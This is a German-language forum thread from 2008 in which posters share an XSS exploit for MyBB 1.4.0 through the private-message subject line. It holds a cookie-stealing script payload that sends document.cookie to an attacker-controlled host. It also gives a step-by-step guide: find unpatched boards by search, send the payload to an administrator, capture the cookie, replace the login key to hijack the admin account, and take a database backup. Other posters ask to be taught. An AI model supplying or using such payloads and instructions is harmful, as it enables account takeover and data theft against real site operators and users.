XxAnimusxX
Unregistered
Danke:
Erhielt Danke in Beiträgen
|
MyBB 1.4.0 Exploit
Wheeeee, jeder der noch 1.4.0 auf der Platte hat sollte schnell updaten, denn es gibt da en schönen Exploit :D
Die Betreffzeile in einer PM wird nicht richtig geparst, d.h. man kann HTML einfügen.
Ein Script a la <script>document.location="meine.seite.de/?c="+document.cookie</script> kann da ganz schön viel ärger bereiten ^^
Aber pssssssst, das habt ihr nicht von mir ;)
|
|
| 25.08.2008 11:37 |
|
Phoenix
Unregistered
Danke:
Erhielt Danke in Beiträgen
|
RE: MyBB 1.4.0 Exploit
Duuu Chef? :o
Ich kann damit ja sonst nichts anfangen, kannst du mir das nicht beibringen? ^_^
Ich kann sonst nichts und will auch mal'n 1337-Kiddy sein =o
|
|
| 25.08.2008 11:39 |
|
XxAnimusxX
Unregistered
Danke:
Erhielt Danke in Beiträgen
|
RE: MyBB 1.4.0 Exploit
Suche in Google nach dem Begriff "MyBB 1.4" und versuche ein Board ausfindig zu machen, welches noch 1.4.0 drauf hat.
Nun meldeste dich dort an und schreibst am besten dem Admin mit den meisten Rechten eine PN und in den Betreff schreibste dann:
<script>document.location="http://deineseite.de.funpic.de?c="+document.cookie;</script>
Nun werden die Cookies vom Admin an deine Seite geschickt, wo du diese abspeicherst ($_GET["c"])
Du suchst dir nun in diesem Cookie den loginkey und kannst, wenn du diesen Loginkey mit deinem austauschst (musst hierfür in dein Cookies-Ordner, jenen finden der für das Board abgespeichert ist und den Loginkey mit dem des Admins austauschen) und nun die Seite besuchst biste der Admin und kannst so einiges an Schabernack treiben, z.B. ins AdminCP und ein DB-Backup ziehen :b
Die Erfahrung zeigt, das noch viele Leute 1.4.0 benutzen da das Upgrade auf 1.4.1 noch Probleme hat.
|
|
| 25.08.2008 11:43 |
|
Phoenix
Unregistered
Danke:
Erhielt Danke in Beiträgen
|
RE: MyBB 1.4.0 Exploit
Hakan schrieb:[...]an deine Seite geschickt[...]
Tja... welche Seite xD
|
|
| 25.08.2008 13:17 |
|
ganxTaa x3
{*>~©‘©~<*}
Beiträge: 66
Registriert seit: Jan 2007
Bewertung 93
Verwarnungslevel: 0%
Danke: 0
Erhielt 0 Danke in 0 Beiträgen
|
RE: MyBB 1.4.0 Exploit
Phoenix schrieb:Hakan schrieb:[...]an deine Seite geschickt[...]
Tja... welche Seite xD
Meld dich z.B. bei Funpic an und lad folgendes PHP-Script auf deinen Server:
Dann passt du halt
auf deine Funpic-URL an ;)
Danke für den Tipp, Ani :)
|
|
| 25.08.2008 13:52 |
|
akurei
Unregistered
Danke:
Erhielt Danke in Beiträgen
|
RE: MyBB 1.4.0 Exploit
---
|
|
| 25.08.2008 15:03 |
|
Phoenix
Unregistered
Danke:
Erhielt Danke in Beiträgen
|
RE: MyBB 1.4.0 Exploit
Habe noch nie irgendwas in der Art gemacht ._.
Wo muss ich den PHP-Code denn einfügen?
Davon hab' ich soviel Ahnung wie von Chinesisch.
|
|
| 25.08.2008 15:07 |
|
akurei
Unregistered
Danke:
Erhielt Danke in Beiträgen
|
RE: MyBB 1.4.0 Exploit
---
|
|
| 25.08.2008 15:15 |
|
carbonat
Unregistered
Danke:
Erhielt Danke in Beiträgen
|
RE: MyBB 1.4.0 Exploit
akurei schrieb:Soweit ichs verstanden habe in die Betreffzeile der PM.
Aber man kann immer nur Daten auslesen, von der Seite, auf der man sich gerade befindet, oder?
Ja, den Cookie.. xD
damit kannste dich dann einloggen ^.^
|
|
| 25.08.2008 15:16 |
|
Phoenix
Unregistered
Danke:
Erhielt Danke in Beiträgen
|
RE: MyBB 1.4.0 Exploit
Ihr Pappnase :'(
Was erwartet ihr eigentlich von mir xD
Erbarme sich doch mal einer und glubscht bei Teamviewer hier rüber.
|
|
| 25.08.2008 15:20 |
|
|
